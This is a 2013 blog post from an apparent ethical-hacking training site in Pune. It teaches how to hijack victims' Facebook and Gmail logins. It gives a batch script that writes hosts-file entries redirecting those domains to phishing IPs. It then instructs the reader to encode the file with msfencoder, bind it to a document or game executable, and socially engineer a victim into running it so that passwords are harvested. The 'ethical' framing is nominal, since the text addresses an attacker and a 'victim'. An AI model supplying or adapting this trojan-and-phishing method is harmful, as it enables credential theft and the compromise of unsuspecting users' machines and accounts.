ExtremeHacking
Today : | Time : | safemode : ON
> / Main Website / Cyber Surakha Abhiyan / Hackers Charity / Linkedin / facebook / twitter /
Name Author Perms Com Modified Label

Hacking Facebook and Gmail accounts with simple DNS Spoofing. Unknown rwxr-xr-x 0 7/22/2013

Filename Hacking Facebook and Gmail accounts with simple DNS Spoofing.
Permission rw-r--r--
Author Unknown
Date and Time 7/22/2013
Label
Action
Ethical Hacking Institute in Pune
./Arizona Team




























Hello friends we are back with a small batch coding that will help you in Dns Spoofing on a windows machine and with help of that you can easily tweak your victim and hack its facebook or gmail account. In short a Cocktail attack of DNS Spoofing + Phishing + Social Engineering.

So lets start with a small batch coding:

But before starting we need a phish page, I have already covered in my CEH(Certified Ethical Hacker) class about how to make a phish page and change the code according to our needs. So Iam not going to spend time on how to make Phish pages. The main thing what we need is the Live IP Address of our Phish Page. For this thread lets consider our Live IP Address for Facebook Phish page is "31.13.83.33" and for Gmail is
"31.13.83.34".
now open your notepad and type the following code.

------------------------------------------------------------------
@echo off

echo. >> %systemroot%\system32\drivers\etc\hosts
echo
31.13.83.33 www.facebook.com >> %systemroot%\system32\drivers\etc\hosts
echo. >> %systemroot%\system32\drivers\etc\hosts
echo
31.13.83.34 www.gmail.com >> %systemroot%\system32\drivers\etc\hosts

------------------------------------------------------------------

save this code as "spoof.bat"

So now we are ready with are file which is to be send to our victim. But before sending our file we need to convert it into binary. Converting a file to binary is already covered in our CEH class. Encode this binary with help of any encoder, I will suggest msfencoder. Bind the file with any DOC, PDF or any game exe its upto you what to use.

Use some medium to transfer the file to your victim, here
Social Engineering comes into work. Study your victim little bit and hit the area of Interest so that he clicks on the file.

Once the file is clicked on the victim side it will add a dns entry in the host file of the victim. And we are done.

Now if our victim opens www.facebook.com or www.gmail.com he will be redirected to our phishing page, and without hesitation he/she will enter his/her password which will indirectly be saved in our database.

Bingoo !!! We 0wn3ed r t@rg3t (-_-)

Follow the steps and let know your experience. If you have any problem you can shoot your questions at instructor@arizonainfotech.com

Happy Hacking, and do spread security awareness among your friends too.

www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune 
 

Cyber Suraksha Abhiyan | Sadik Shaikh © 2015 Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune
Extreme Hacking Template design by Sadik Shaikh | Cyber Suraksha Abhiyan